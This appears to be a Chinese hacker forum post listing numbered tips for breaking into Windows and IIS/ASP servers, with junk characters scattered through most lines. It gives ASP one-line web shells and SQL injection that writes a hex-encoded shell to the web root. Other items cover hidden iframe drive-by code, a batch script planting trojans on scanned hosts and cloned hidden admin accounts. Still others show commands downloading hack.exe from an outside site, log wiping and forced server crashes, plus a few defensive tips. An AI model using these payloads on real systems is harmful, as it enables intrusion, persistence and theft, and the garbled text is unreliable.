Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
0 Q3 b( b% t5 d5 F3 P9 Ecacls C:\windows\system32 /G hqw20:R- J. w7 J* m4 i$ }. E
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入; o8 ~! v' c- @( {
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
' }7 W! e0 x7 v! Z
! p8 d7 J( g0 l( k+ b+ e+ h" U2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。' w; K6 Y7 s7 {- }6 d
; H! _) P. Y1 h7 n$ `6 O* W3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
" f4 P- t! s4 Z f# V: V! h; b8 w( X
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
, O& k5 }; j' |/ v5 \/ Y, H, I e$ u% U% \
5、利用INF文件来修改注册表
- E! w8 U$ `/ ?- I; ]0 q& `[Version]* a2 z) F" C# ^, P. F
Signature="$CHICAGO$") e8 ?) q1 g2 L$ b( n# J- Z
[Defaultinstall]% O) l; K, Y! J3 |5 b& h: h
addREG=Ating
. V7 C& T, G( _/ \7 C4 V[Ating]
0 u: k; R0 F& a2 oHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
5 ~" S8 ^7 E9 a9 `- W8 _' z以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:* h, I+ U4 \& l8 k
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
4 L# k9 x+ D: J9 E4 v) j3 _其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
' v {- H- v2 ]4 \HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU9 g$ z# a! ]6 t$ x. M8 C
HKEY_CURRENT_CONFIG 简写为 HKCC& s( ~) O! ]) V7 `
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值4 j0 e9 M+ k, Q4 u7 W- S/ j' a% i
"1"这里代表是写入或删除注册表键值中的具体数据; I: i$ G( n- ]+ b. I' H6 u
( {5 x9 o: _; O% m6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,: a( F6 r p. { M6 ^' Y0 q9 C
多了一步就是在防火墙里添加个端口,然后导出其键值6 v+ t. L2 i4 M5 F/ z
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
- v: B% E' s2 }6 y" g
, \* d% N, R( Y+ s1 ]! R& a1 n8 I7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
3 \( h- X3 b4 u: m; @; I* B `* g0 ]在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
! I; s+ l1 E5 @& K* W2 Z( E$ U1 {. T& t
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。& [ l1 ?# K" V) C& o4 c/ z
( `0 A& k+ p W* N9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
/ }; u- D; U8 [9 q' J3 x: J0 |# `可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
3 v4 {" N- }+ d5 ?6 u6 F. g, r! ~
5 G& j. U" {& I0 y0 s1 M10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
) _& C% _. L- O
$ c+ R! Z( F `% U. n, ?/ ]4 m& i, B11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,+ R; d- j% i7 z, B0 f
用法:xsniff –pass –hide –log pass.txt y% N- Z9 z" ^
. W9 E I4 \. }& h12、google搜索的艺术9 ]5 E. {3 ]- g7 b
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”& s4 @8 t5 ]$ e# z0 {
或“字符串的语法错误”可以找到很多sql注入漏洞。
& e- x( V* U0 h l% g& m
3 I0 F! k6 n" k; u& G2 f/ b. d8 a13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
. l+ A# N0 @5 s9 [9 {. L9 m+ @% @+ s* q# v P4 o; x5 l( u
14、cmd中输入 nc –vv –l –p 1987
( M! p" n! j) {+ S4 T做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃% O% I7 n% L. D" i
# ?$ I- F1 s6 O) J9 h15、制作T++木马,先写个ating.hta文件,内容为
4 I! {& j. W! Y0 [, b( W" ]<script language="VBScript">3 i; |% e9 B" [- z! |
set wshshell=createobject ("wscript.shell" )
) H8 H1 z2 t3 Y- d& x6 za=wshshell.run("你马的名称",1); e4 N' c+ {8 g) x4 ]5 E; u" `* p3 d
window.close
8 c* m% S: K* [+ X) Z</script> H1 e- t7 [6 m8 w+ H9 @7 G4 T
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。 \( {& ~! J$ J
6 E8 S X1 K! d8 a" f# o
16、搜索栏里输入
' o/ g0 N# c! d+ v% f, t% T' u关键字%'and 1=1 and '%'='
7 F' V* ?) v, @6 s; @关键字%'and 1=2 and '%'='
3 t% o) u5 x6 [4 S% A比较不同处 可以作为注入的特征字符, X# L- h, l; }4 {. `
* p# l9 Z9 e4 s! S/ p$ V7 r; \
17、挂马代码<html>& {7 P0 }) P( {5 e1 T1 u
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
* F9 s- u" a, l4 N</html>
. J b5 c5 g, ]. C- G. t
+ z! r Q& _5 q7 S& x18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,' k2 s2 F! n9 r1 J0 w/ V5 M
net localgroup administrators还是可以看出Guest是管理员来。
5 _1 E9 G+ _ \4 I6 K/ m
% x, t) y+ G4 S, p8 _19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等& z/ j# @) Z4 D _0 S
用法: 安装: instsrv.exe 服务名称 路径
$ ~/ E7 C0 g# X4 j2 s5 _4 h卸载: instsrv.exe 服务名称 REMOVE- i0 N( t; B1 r6 I5 i3 K0 i
. ?1 x4 a4 V' R7 S# k! x; w
& q& U6 u$ C1 i* d& j7 w9 p
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
N6 h( ?1 m% c+ y# V9 b* V; E不能注入时要第一时间想到%5c暴库。1 I8 s: a0 |3 y9 z% s8 q! p
" @4 l. t. z) m: z) ?5 {' x7 g22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~% K4 T K3 _6 O! C
4 _1 Q$ T6 d) S0 |; `9 T3 q h
23、缺少xp_cmdshell时1 g! _: T! y8 n% V3 N
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
, h4 Q f- q2 F6 D假如恢复不成功,可以尝试直接加用户(针对开3389的). b% R) S6 w( q
declare @o int8 K/ B* ~) J- ]1 e; Q
exec sp_oacreate 'wscript.shell',@o out4 i* U; x6 G# K; l2 `" y$ l) e5 }
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
7 V( b% S$ H @7 P( O: I, R3 F/ i. D# d& f0 q/ z- c7 m) ?: f
24.批量种植木马.bat
9 Q8 ~% B2 T* Qfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中4 {. Y& U Z) K: D% Z& R6 f4 i! K# K
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间* A( z' }8 t2 d. q( U4 b# B, i
扫描地址.txt里每个主机名一行 用\\开头% `& V5 j. j1 Z: w" r/ V; a
9 m1 P: U% E- D' c* b( C" O25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。' L% }9 C1 V. ?5 l! y3 d
/ c3 i2 ]/ b7 p0 p
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
+ L& F+ L# a2 W" m将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.6 k; w% e! c3 L
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
) h1 h0 s" ]9 O, E' V4 {5 P8 _3 F6 v4 e' e3 ~
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
. b2 {5 o3 V+ f4 _+ _7 J然后用#clear logg和#clear line vty *删除日志
/ F3 Y5 i/ l3 r, a& \% }, b5 e% j. Z3 n
28、电脑坏了省去重新安装系统的方法9 [! h8 ~0 T. `/ x" a% m) C9 c
纯dos下执行,
5 D; A, \0 b' g. [xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
- u. _ @$ h3 h2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
* ?9 `3 J) R3 U9 p3 y+ b( l; Z1 o9 F. C3 C% w0 k4 i
29、解决TCP/IP筛选 在注册表里有三处,分别是:+ B. c0 r1 c; D) t; p9 _) Y: b
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip5 N% p- L5 r1 {3 m
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip8 O% g( x& E: n7 ?/ n% ^' o7 P
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip/ `& W( Q8 q0 o; z$ `/ x6 B" R7 u
分别用
4 r1 b2 ?: E0 u4 @8 l1 B/ oregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 M& v! x, e, M+ Nregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip7 h$ T/ B. Q/ y+ i0 f4 L5 _
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip+ C% S! b) z- p8 {6 r
命令来导出注册表项
/ s5 d( I3 N: ]2 w然后把三个文件里的EnableSecurityFilters"=dword:00000001,2 Y( W$ P( }# ?1 ?; a+ x: S
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
1 |) u+ c! g# r# ] @% tregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。7 s7 {" Q @: l; l$ I5 f# u: o0 R8 t
% e% ~/ ?5 f; ~/ u9 {( i- J* W6 s30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U! x, l0 B3 L( f- k
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
u% j) f7 R/ _: g6 A3 c
9 m8 s N) j* e31、全手工打造开3389工具" K# n9 h4 |- a% r+ X9 A2 O9 C
打开记事本,编辑内容如下:
) {' j, T7 z% i) Vecho [Components] > c:\sql
2 m7 B$ j: S) Y2 T' l9 ]echo TSEnable = on >> c:\sql0 g! H. G! Y( w; a d
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q! _: r6 H; G$ i3 [
编辑好后存为BAT文件,上传至肉鸡,执行
7 i" s) n9 r+ Y8 b! @
' x! e. u2 Y2 M4 l( k32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
5 |# L6 }6 O! u6 w- M) b7 x. Q4 {" i. ~$ U% x% l* w
33、让服务器重启5 m* H4 o6 U0 p
写个bat死循环:" l. g7 `% h+ ~% j' \ Y3 U3 Q
@echo off! ?' n7 G0 g' I0 s7 O2 U7 w
:loop1, q Y2 j1 o$ Q) Q3 a
cls# |1 `6 u7 f7 c# [# c
start cmd.exe4 G* w D0 }; ?* s" _/ i
goto loop1
2 p" ?9 i" O+ ]保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启& `" y5 Z8 x; O2 E- c) N7 F
8 V& r* u5 s* d/ m$ v, k
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,8 J+ A) N4 z( Q
@echo off
0 d5 j9 P5 p! Y* @9 X, rdate /t >c:/3389.txt( f' x/ P/ E, v0 F0 o$ w0 J
time /t >>c:/3389.txt
. j' {5 A- ]* J4 u0 ]8 x: kattrib +s +h c:/3389.bat# y% r- d+ D u1 Q, z* Y
attrib +s +h c:/3389.txt: J5 o3 K4 n' c* S
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
& T- K* u& F; x- H' X/ n并保存为3389.bat
9 e! O% J6 }$ a* x9 @# R0 b打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
# f. R# Y5 I7 \! N! ^& J: c
4 }! w* t. t* e& m35、有时候提不了权限的话,试试这个命令,在命令行里输入:% A; B2 b4 g0 k- e" J2 P$ r
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页) f0 N8 o5 L% `0 A' w$ r) m
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。8 p( |) r2 D% @7 k
3 P U6 m, e/ L s; D* E0 J36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件% b d3 f5 }. R
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
r) p. j x% t# i. `echo 你的FTP账号 >>c:\1.bat //输入账号: t7 r8 O6 J6 T4 k; j# p
echo 你的FTP密码 >>c:\1.bat //输入密码+ d8 Z% F% J2 A3 @+ k3 i8 R
echo bin >>c:\1.bat //登入9 j' D0 x( h/ e; n( _) q
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
; l# [/ o5 R1 k# l" w2 Yecho bye >>c:\1.bat //退出
; G& f0 W# b! J5 ^; d" p7 R然后执行ftp -s:c:\1.bat即可& G* [& u' G0 J
( F/ T$ ~9 e% H* L
37、修改注册表开3389两法) l7 V/ n' V, E! r
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表$ _5 }4 a; e$ O- f
echo Windows Registry Editor Version 5.00 >>3389.reg3 c G. G3 I; |4 x- {/ l/ S4 u! D
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg4 \9 N4 \& d, p& ^4 T" Q
echo "Enabled"="0" >>3389.reg
6 E* ]6 I( n3 k0 V3 H: Zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ D+ y7 R, Q" |$ W3 [5 P! X; m' \NT\CurrentVersion\Winlogon] >>3389.reg
% [7 |6 j; b, J9 jecho "ShutdownWithoutLogon"="0" >>3389.reg+ n+ H. A& a' N5 H) Y. k
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
* w3 q3 w1 I* ]0 ?9 @5 m* `1 \>>3389.reg4 {( f. t# u1 ^3 j
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg( ], H! S) \3 P6 R+ V! \- {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
; D2 [, l1 H7 u>>3389.reg
3 f2 h5 v4 L A1 B3 f0 d. Vecho "TSEnabled"=dword:00000001 >>3389.reg3 ^( A! [/ X0 M
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg7 I8 s& m8 }4 E2 l( d# i2 _
echo "Start"=dword:00000002 >>3389.reg
2 L. {" W1 p7 }0 X" ]% Jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
7 ]2 z0 C7 }& l4 I4 Y( \2 Y3 B>>3389.reg1 P0 F( B H+ X* Z4 J
echo "Start"=dword:00000002 >>3389.reg
; t) y5 W: F1 M' y" A1 iecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
" [% [$ _8 |! Uecho "Hotkey"="1" >>3389.reg
* Z$ Y6 t2 R7 ?- u, _- D: q8 b6 W$ Eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal7 a, X$ l& x' c" R
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
% H. a. c, c$ M/ n5 p$ }4 y% Techo "PortNumber"=dword:00000D3D >>3389.reg
3 i& g; V% Y1 \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: p7 u, w/ X- U" C4 J2 h4 VServer\WinStations\RDP-Tcp] >>3389.reg
& q3 [. K* F9 I1 v- S3 uecho "PortNumber"=dword:00000D3D >>3389.reg3 h. g6 x) `5 a ]7 H
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
d# e( n" v% c) a& I9 c% F& W(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
6 U& u2 w* ]& t9 J4 Q1 g& V% |因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效& p- { p) x0 f7 b) b" I
(2)winxp和win2003终端开启
+ M$ [0 L9 s2 F2 i# o* S. h+ L% n; z用以下ECHO代码写一个REG文件:% k p% f+ f u* L
echo Windows Registry Editor Version 5.00>>3389.reg6 Y9 w4 c% U7 }4 [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal# N; x8 Q4 @9 C% K6 ]- x
Server]>>3389.reg+ H2 K) F( X2 |4 u: U2 W* j
echo "fDenyTSConnections"=dword:00000000>>3389.reg7 M) S8 [, t, h' r9 m' D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. h7 L9 S; Y R3 W" H& E. C
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
2 f2 g6 Q" j: i- V3 ^echo "PortNumber"=dword:00000d3d>>3389.reg
& s! t# Y, t* fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 o# f4 }8 c7 U+ e, b5 S( MServer\WinStations\RDP-Tcp]>>3389.reg1 o3 W$ j. u. k3 y; \# p+ i3 C
echo "PortNumber"=dword:00000d3d>>3389.reg
# L. k& t; Y4 a/ D然后regedit /s 3389.reg del 3389.reg9 {7 o. i6 m8 \
XP下不论开终端还是改终端端口都不需重启4 a- m' v) I* I- I
' R: h6 {) I& X _( V; T
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃5 }( ?2 v$ l" }0 S! V7 _! H$ M% N
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
& \9 D: A# s; u
, ]7 t$ y5 H' D7 O9 q! g3 |/ x39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!0 l4 p% D/ g% w7 u% h
(1)数据库文件名应复杂并要有特殊字符
" ?8 ~$ x* m/ I! M0 t2 Z6 Q8 N(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
- P/ `1 P6 U0 H- i; |- P; j将conn.asp文档中的
8 X5 K3 d* ^7 R& o. IDBPath = Server.MapPath("数据库.mdb")/ u3 e5 _) }# N( S5 h k/ G
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath) }( l/ o; d( Z8 `9 U( m
) _7 B. P( X, A8 W$ K' C修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置4 q& C7 \8 v% a: ~
(3)不放在WEB目录里 V& M! Z% P/ G/ D
v% }+ @- F& D* o) ?) I1 C* T40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉, t% U" h+ {7 A; l' V2 X7 N3 L
可以写两个bat文件
/ v# f( X, Q% J@echo off6 C4 o/ Z# s5 ]; O
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
- g" x' g1 u7 [) a7 W@del c:\winnt\system32\query.exe
* p, m0 }' J1 h$ y# U@del %SYSTEMROOT%\system32\dllcache\query.exe3 p/ E6 a# u4 m; G) i& v
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
% [6 _- _) _, H8 \% T3 m) u3 }
9 A& U1 u) F3 p@echo off: Y: b: {" N& x
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe+ a1 L: |, O0 ?2 {' X) n* x g
@del c:\winnt\system32\tsadmin.exe* \) F. m3 l2 @
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
% m' J( A! x) x8 `+ H9 S! \: l+ w4 q6 L# }/ B
41、映射对方盘符
- v* Y, l# p$ d% \- W. w# t, jtelnet到他的机器上,; r1 }' Q, M) S7 _( X
net share 查看有没有默认共享 如果没有,那么就接着运行: r1 F- Q7 x6 l& J# c: d9 T% N$ Q
net share c$=c:$ U: M" w% J n! w8 d
net share现在有c$
! } {4 v4 Q$ T7 l: I6 x6 t' \在自己的机器上运行
+ S c$ ]& q! @5 \7 Nnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
: g* Y# |* v7 A# a
# l7 z* m5 y0 o1 k9 Q1 D2 F42、一些很有用的老知识
O% H3 Q5 Q" y8 Jtype c:\boot.ini ( 查看系统版本 )
# o* @8 t3 z, `net start (查看已经启动的服务)
7 K7 X: m" z" q4 ?5 `query user ( 查看当前终端连接 )/ p0 r* O; J# D5 B9 s5 c1 H
net user ( 查看当前用户 )
- e( x* Y7 t' y8 Tnet user 用户 密码/add ( 建立账号 ): m# q9 S: ~$ U) U
net localgroup administrators 用户 /add (提升某用户为管理员)
8 r3 E4 a; J" f) K- \5 sipconfig -all ( 查看IP什么的 )
[7 j* E$ z1 Z& F" {( onetstat -an ( 查看当前网络状态 )
6 x1 n) `8 [) ]. @% L* e# j* e! W2 Sfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
. U. [5 l( `" j克隆时Administrator对应1F4
" w% N$ A, H( |: rguest对应1F5, r; O7 U i. t
tsinternetuser对应3E8' r/ X$ o8 S" e& D$ {6 p! y: Q
6 {: c* ^- g6 D1 t- u. o43、如果对方没开3389,但是装了Remote Administrator Service
" ^1 I" j* I: K+ M0 f4 Z( X+ K用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
) k, H" u! V2 w: Q7 y7 w解释:用serv-u漏洞导入自己配制好的radmin的注册表信息: W3 Q" B! ~2 g: d; _* U1 O3 j5 t
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
# ]1 i3 s) N2 W! t# t
3 ~5 h' t j5 Y- N. O# b2 \44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)9 E5 g# a* }' D& C9 J, p* `9 `
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
/ K! \# y0 o, h* x
, x/ V+ W6 x p. m2 G4 ~3 _; c45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
: ]# U' d7 \1 `echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
" e5 c1 J8 `- g1 P p^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =6 {! i/ [# A+ p3 c
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
' z7 B; Q+ W: d& v2 D6 w( e3 x1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
s. X6 c9 h+ J- |* ]. j: _4 C: G4 R(这是完整的一句话,其中没有换行符)' E: \ i1 K9 z
然后下载:
6 k: V- l8 `( kcscript down.vbs http://www.hack520.org/hack.exe hack.exe
7 @* q3 V: B! B
: D! @- v( E0 f9 t1 Y* K3 T: s46、一句话木马成功依赖于两个条件:' H7 z+ {: q M% v% R. ]6 H& U/ @
1、服务端没有禁止adodb.Stream或FSO组件
" \5 X- M a; a" o. V" [" d8 u2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
# A/ k6 A4 @' g* p2 d
& g! X" n$ L+ O5 _, [; U47、利用DB_OWNER权限进行手工备份一句话木马的代码:/ r z# Y1 _ z9 n" E2 y$ Q" R
;alter database utsz set RECOVERY FULL--+ N: S$ E- X) b0 R7 s% Z
;create table cmd (a image)--& Z- u" v1 ~: _! j% C
;backup log utsz to disk = 'D:\cmd' with init--
9 d5 N' H$ P* u. N3 m2 U;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--3 Z. g3 h7 V6 S/ b
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
4 b& }: H( ?- z/ |! U N# F; |7 H注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
4 h6 ?- W8 |2 d; U1 E) E
' J! x$ a8 {$ P48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
1 ?1 K7 J$ D5 z5 B ^. ?
[ Q9 k# \# k8 u用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options( F7 u- w* |: Q8 N5 q' Z- {
所有会话用 'all'。0 ]" U+ p) a2 O2 R# q, o8 g
-s sessionid 列出会话的信息。
4 l5 @( E* `3 {8 a-k sessionid 终止会话。
& C* | v+ {# O-m sessionid 发送消息到会话。7 N, ^% K- C& Z! B
- x2 P+ ^9 M( z" U1 tconfig 配置 telnet 服务器参数。
[$ Y' |9 z2 |8 r3 i, |$ D9 H5 F, v5 C, L
common_options 为:1 d$ N, ^+ Z- @/ s% F- R: o
-u user 指定要使用其凭据的用户
3 o4 A3 [, ~3 R- R0 y; `-p password 用户密码
, w# J4 a5 ^! t9 H* c ] m" Z
! O0 H- ~9 _# U/ ~) R9 Rconfig_options 为:% K- G/ y% v4 R, m6 s0 ~. E
dom = domain 设定用户的默认域
& x& K, b4 t. t7 f/ actrlakeymap = yes|no 设定 ALT 键的映射
D/ c/ C" K" itimeout = hh:mm:ss 设定空闲会话超时值
2 \8 ^5 |* ~ d1 i e) U/ f( q" M' M9 h: ?timeoutactive = yes|no 启用空闲会话。
$ u% J$ {. F# q( n# x; xmaxfail = attempts 设定断开前失败的登录企图数。8 i( Q# p/ I# R$ w6 y" O: V
maxconn = connections 设定最大连接数。$ \6 @" i! S7 O6 n; m( ~% ~
port = number 设定 telnet 端口。
$ T0 N3 w% O; u/ P5 r) |# M1 xsec = [+/-]NTLM [+/-]passwd
% m' b) m! ?+ l" k$ t设定身份验证机构: p2 ?- z5 k4 X; M \4 @
fname = file 指定审计文件名。
$ ^ L x6 X; r! ufsize = size 指定审计文件的最大尺寸(MB)。4 k8 p% u) x$ B4 ?: J5 p& G
mode = console|stream 指定操作模式。5 r9 U5 Z1 e% E0 Z, s* z
auditlocation = eventlog|file|both
* v* ^% Q9 R8 [5 c指定记录地点, U, Z$ ~6 _! y$ }# S/ L
audit = [+/-]user [+/-]fail [+/-]admin
! i6 N- O5 K& L g; f0 v$ E2 p7 U
49、例如:在IE上访问:
& i7 c* Z, r5 @www.hack520.org/hack.txt就会跳转到http://www.hack520.org/: d0 t; F0 ]9 k; v" A; F
hack.txt里面的代码是:$ j* ?! {6 M% C( r! a5 A6 p4 J6 @
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">; D- e! H" [" M" s0 D1 x6 H; u
把这个hack.txt发到你空间就可以了!
5 [6 G8 P7 j1 y9 ?这个可以利用来做网马哦!3 K& L( b4 `- \) X
- { L4 H' G/ n, r: Z0 n2 \5 ~1 L( f50、autorun的病毒可以通过手动限制!
+ e6 E& w6 z; e6 }' Z5 s1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!# V, R! x' }) B0 t( \- ~0 U8 O) L
2,打开盘符用右键打开!切忌双击盘符~) |$ k; _. R) p: x1 r9 a
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
( e x6 ~, @5 o; f
; H% a( o; h2 @; d# {: e/ R51、log备份时的一句话木马:3 r, j% Z% |9 m
a).<%%25Execute(request("go"))%%25>
- O8 s4 ~) e: Y# Y- s6 E, J" pb).<%Execute(request("go"))%>5 D( B; p- G; I( E3 T
c).%><%execute request("go")%><%
8 E) L, B- J' j0 Pd).<script language=VBScript runat=server>execute request("sb")</Script>
! f1 E4 |$ w0 r8 {5 te).<%25Execute(request("l"))%25>( s. i, i* M; ~; E+ m# F G
f).<%if request("cmd")<>"" then execute request("pass")%>6 j2 T# b8 L% M, H8 k
8 o8 `2 M# v# j) P+ M7 k1 D% A- \
52、at "12:17" /interactive cmd
* F* \$ `8 z( C6 ~6 O# r: G执行后可以用AT命令查看新加的任务" _/ d' c' W" G+ Z v
